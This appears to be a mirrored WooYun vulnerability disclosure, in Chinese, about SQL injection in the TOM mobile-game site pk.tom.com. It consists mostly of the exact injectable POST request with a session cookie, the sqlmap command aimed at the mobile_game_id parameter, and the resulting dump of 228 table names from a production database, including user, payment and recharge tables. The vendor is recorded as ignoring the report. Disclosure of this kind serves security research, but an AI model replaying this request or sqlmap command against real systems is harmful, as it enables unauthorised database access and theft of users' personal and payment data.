乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-09: 细节已通知厂商并且等待厂商处理中 2015-06-14: 厂商已经主动忽略漏洞,细节向公众公开
tom自己说的40万啊
POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1Host: pk.tom.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=abc1jamRVmxlb9eZvF82uConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 20mobile_game_id=12777
sqlmap.py -r test.txt -p mobile_game_id --dbms mysqlpost注入
Database: newwapdb[228 tables]+---------------------------------------+| back_download_game_info || bind_tom_139 || download_count || filter_words || game_bulletin || game_clientinfo || game_cogameinfo || game_coinfo || game_goods || game_goods_type || game_mission || game_netbattle || game_netbattle_item || game_photo || game_single_record || game_stat_day || game_toolsinfo || game_uids || game_user || game_user_black || game_user_chat || game_user_friend || game_user_level || game_user_sign || game_user_sns || game_user_task || game_user_visitor || game_useraddressinfo || game_usergold || game_usergolddetail || game_usergoods || game_userinfo || game_usermdoupmsg || game_userpay_offerclient || game_userpayrecord || game_userprize || game_userrandom || game_userrandom_bak || game_userrandom_new || game_userrechargerecord || game_v2_netbattle || game_v2_netbattle_finalgoldinfo || game_v3_bulletin || game_v3_friends || game_v3_linkmobile || game_v3_netbattle || game_v3_netbattle_finalgoldinfo || game_v3_netbattle_item || game_v3_pksparameter || game_v3_prizes || game_v3_sendsmsinfo || game_v3_single_record || game_v3_usergold || game_v3_usergolddetail || game_v3_userinfo || game_v3_userprize || game_v4_adv_record || game_v4_bulletin || game_v4_bulletin_wap || game_v4_cmddisc_history || game_v4_coupon_history || game_v4_couponprize_info || game_v4_fgrechargeprize_history || game_v4_finalgold_rechargeinfo || game_v4_friends || game_v4_gamedown_config || game_v4_gametype_info || game_v4_linkmobile || game_v4_lucklydraw_history || game_v4_manualprize || game_v4_manualprize_info || game_v4_message || game_v4_message_bak20120420 || game_v4_message_bak20120501 || game_v4_message_bak20120604 || game_v4_message_location || game_v4_message_location_bak20120420 || game_v4_message_location_bak20120501 || game_v4_message_location_bak20120604 || game_v4_message_location_new || game_v4_message_new || game_v4_mobileuid_linkinfo || game_v4_msgpush_info || game_v4_msgpush_type || game_v4_netbattle || game_v4_netbattle_bak20120420 || game_v4_netbattle_finalgoldinfo || game_v4_netbattle_item || game_v4_netbattle_item_bak20120420 || game_v4_onlinegame_info || game_v4_onlinegame_itempayment || game_v4_onlinegame_smscode || game_v4_payment_platform_detail || game_v4_pksparameter || game_v4_prizes || game_v4_robot_sendsmscount || game_v4_robotinfo || game_v4_sendsmsinfo || game_v4_single_record || game_v4_thirdpart_cardinfo || game_v4_thirdpart_partnerinfo || game_v4_thirdpart_usercard || game_v4_topboard || game_v4_user_freegold || game_v4_user_freegold_monthly || game_v4_user_freegolddetail || game_v4_user_prizeinfo || game_v4_userbattle_summarizinfo || game_v4_usercoupon_info || game_v4_usergold || game_v4_usergolddetail || game_v4_userinfo || game_v4_userinfo_extend || game_v4_userlogin |
该有的表都有了
过滤
危害等级:无影响厂商忽略
忽略时间:2015-06-14 10:30
漏洞Rank:15 (WooYun评价)
暂无